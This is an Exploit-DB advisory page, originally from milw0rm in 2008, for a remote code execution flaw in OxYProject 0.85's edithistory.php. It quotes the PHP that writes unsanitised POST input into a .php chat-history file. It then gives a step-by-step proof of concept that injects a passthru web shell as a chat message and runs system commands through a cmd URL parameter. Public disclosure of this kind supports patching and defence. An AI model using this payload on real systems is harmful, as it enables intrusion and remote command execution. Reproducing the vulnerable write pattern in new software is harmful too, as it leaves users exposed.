OxYProject 0.85 - 'edithistory.php' Remote Code Execution

EDB-ID:

5524


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2008-04-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability
Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip
Code Vuln  :
###################Ln 24###################
include('oxycfg.php');

//########################################
//	Editing the Chat History
//########################################

$edit_file = $file['Chat_History'];
$fh = fopen($edit_file, 'a') or die("<meta http-equiv=\"refresh\" content=\"1 ;url=oxybox_submit.php\"><font face=\"arial\">Error occured when submitting your message. <a href=\"javascript: history.go(-1)\">Back</a></font>");
fwrite($fh, "<b><font face=\"arial\" color=" . $_POST["usercolor"] . ">" . $_POST["oxyname"] . " :</font></b> <font color=" . $_POST["msgcolor"] . ">" . $_POST["oxymsg"] . "</font><br>");
fclose($fh);
###################Ln 33###################
In The Page "oxycfg.php"
###################Ln 33###################
$file['Chat_History'] = "oxyhistory.php";
###################Ln 23###################
POC :
Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php 
You'll see In this Page
Username [?]                      Your message has been successfully submitted [X]
              Your Message Here
Username Color [?]  black     Enter Message
In The "Username" Write "Gold_M" 
In The "Your Message Here" Write This Code "<?php passthru($_GET[cmd]); ?>"
Afte All this Click  "Enter Message"
Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir
# Thanx To TryagOxY

# milw0rm.com [2008-04-30]